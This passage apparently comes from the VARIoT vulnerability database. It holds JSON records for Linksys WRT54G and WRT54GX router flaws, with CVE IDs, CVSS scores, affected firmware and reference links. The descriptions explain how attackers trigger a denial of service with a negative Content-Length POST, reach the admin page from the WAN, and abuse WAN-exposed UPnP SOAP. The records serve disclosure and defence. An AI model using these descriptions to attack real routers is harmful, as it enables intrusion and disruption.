"id": "CNNVD-200603-107"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Multiple router denial of service vulnerability",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.8
}
}
VAR-200509-0093
Vulnerability from variot - Updated: 2023-12-18 12:24
Linksys WRT54G router allows remote attackers to cause a denial of service (CPU consumption and server hang) via an HTTP POST request with a negative Content-Length value. WRT54G v1.0 is prone to a denial-of-service vulnerability. Linksys WRT54G is a Cisco wireless router.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89346"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2912",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-14121",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2912",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-130",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14121",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G router allows remote attackers to cause a denial of service (CPU consumption and server hang) via an HTTP POST request with a negative Content-Length value. WRT54G v1.0 is prone to a denial-of-service vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "VULHUB",
"id": "VHN-14121"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2912",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G MANAGEMENT INTERFACE DOS VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89346",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14121",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"id": "VAR-200509-0093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:24:17.858000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14121"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89346"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14121"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89346"
},
{
"date": "2008-09-05T20:52:58.640000",
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Denial of service vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
}
}
VAR-200412-0788
Vulnerability from variot - Updated: 2023-12-18 12:13
The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to log in to an administration web page, even when the configuration specifies that remote administration is disabled. Linksys WRT54G Router is a router device.
Even when the management function is turned off, the Linksys WRT54G Router still serves its management web pages on ports 80 and 443 of the WAN interface. As a result, an attacker can access the management interface. In combination with other vulnerabilities, an attacker may gain control of the router. A weakness is reported to affect the Linksys WRT54G appliance.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200412-0788",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.02.7"
},
{
"model": "befsr41 v3",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "befsr41 v3",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "samadhi2 .6sv",
"scope": "eq",
"trust": 0.3,
"vendor": "sveasoft",
"version": "2.0.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "wrt54g beta",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41_v3:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.02.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alan W. Rateliff, II\u203b lists@rateliff.net",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.6
},
"cve": "CVE-2004-2606",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-11034",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-2606",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200412-618",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-11034",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to login to an administration web page, even when the configuration specifies that remote administration is disabled. Linksys WRT54G Router is a router device. \n\n\u00a0Even when the management function is turned off, Linksys WRT54G Router still provides 80 and 443 port management web pages on the WAN interface. As a result, an attacker can access the management interface. In combination with other loopholes, the router may be controlled. A weakness is reported to affect the Linksys WRT54G appliance",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "VULHUB",
"id": "VHN-11034"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-2606",
"trust": 2.3
},
{
"db": "BID",
"id": "10441",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "6577",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "11754",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2004-1560",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040604 THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040604 RE: THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040601 RE: LINKSYS WRT54G ADMINISTRATION PAGE AVAILBLE TO WAN",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040602 RE: THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040602 ADDITIONAL INFORMATION ON WRT54G ADMINISTRATION PAGE",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040531 LINKSYS WRT54G ADMINISTRATION PAGE AVAILBLE TO WAN",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "6513",
"trust": 0.6
},
{
"db": "XF",
"id": "16274",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-11034",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"id": "VAR-200412-0788",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:13:40.262000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/10441"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-05/0316.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0002.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0020.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0190.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/365227/30/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/365175"
},
{
"trust": 1.7,
"url": "ftp://ftp.linksys.com/pub/network/wrt54g_2.02.8_us_code_beta.zip"
},
{
"trust": 1.7,
"url": "http://web.archive.org/web/20040823075750/http://www.linksys.com/download/firmware.asp?fwid=201"
},
{
"trust": 1.7,
"url": "http://www.nwfusion.com/news/2004/0607confuse.html"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/6577"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/11754"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16274"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/16274"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/6513"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/download/firmware.asp?fwid=201"
},
{
"trust": 0.3,
"url": "http://www.sveasoft.com/modules/phpbb2/index.php"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/364977"
},
{
"trust": 0.3,
"url": "/archive/1/364729"
},
{
"trust": 0.3,
"url": "/archive/1/365175"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"date": "2004-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-11034"
},
{
"date": "2004-05-31T00:00:00",
"db": "BID",
"id": "10441"
},
{
"date": "2004-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"date": "2004-05-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-11034"
},
{
"date": "2004-05-31T00:00:00",
"db": "BID",
"id": "10441"
},
{
"date": "2017-07-11T01:32:03",
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"date": "2006-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Router Global Access Management Service Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Design Error",
"sources": [
{
"db": "BID",
"id": "10441"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.9
}
}
VAR-201111-0179
Vulnerability from variot - Updated: 2023-12-18 12:09
The UPnP IGD implementation on the Cisco Linksys WRT54GX with firmware 2.00.05, when UPnP is enabled, configures the SOAP server to listen on the WAN port, which allows remote attackers to administer the firewall via SOAP requests. Separately, the Portable SDK for UPnP Devices (libupnp) library contains multiple buffer overflow vulnerabilities. Devices that use libupnp may also accept UPnP queries over the WAN interface, thereby exposing those vulnerabilities to the internet. Multiple Universal Plug and Play (UPnP)-compatible routers have insufficient access restrictions: on affected routers, unintended UPnP requests arriving on the WAN-side interface are accepted. An unauthenticated remote third party could obtain local network information or use the product as a proxy. Universal Plug and Play (UPnP) is a network protocol that is mostly used for personal computer device discovery and communication with other devices and the Internet. UPnP requests accepted on the WAN interface can be used to connect to internal hosts behind the NAT firewall or to proxy connections through it. Remote unauthenticated attackers can exploit these vulnerabilities to scan internal hosts or to use the device as a proxy for Internet traffic.
The following devices are affected:
Cisco Linksys WRT54G firmware version prior to 4.30.5
Cisco Linksys WRT54GS v1 through v3 firmware versions prior to 4.71.1
Cisco Linksys WRT54GS v4 firmware versions prior to 1.06.1
Cisco Linksys WRT54GX firmware 2.00.05
Edimax BR-6104K prior to 3.25
Edimax 6114Wg
Canyon-Tech CN-WF512 firmware version 1.83
Canyon-Tech CN-WF514 firmware version 2.08
Sitecom WL-153 prior to firmware 1.39
Sitecom WL-111
Sweex LB000021 firmware version 3.15
ZyXEL P-330W
SpeedTouch 5x6 firmware versions prior to 6.2.29
Thomson TG585 firmware versions prior to 7.4.3.2.
----------------------------------------------------------------------
TITLE: Siemens OZW / OZS Multiple Products libupnp Buffer Overflow Vulnerabilities
SECUNIA ADVISORY ID: SA52035
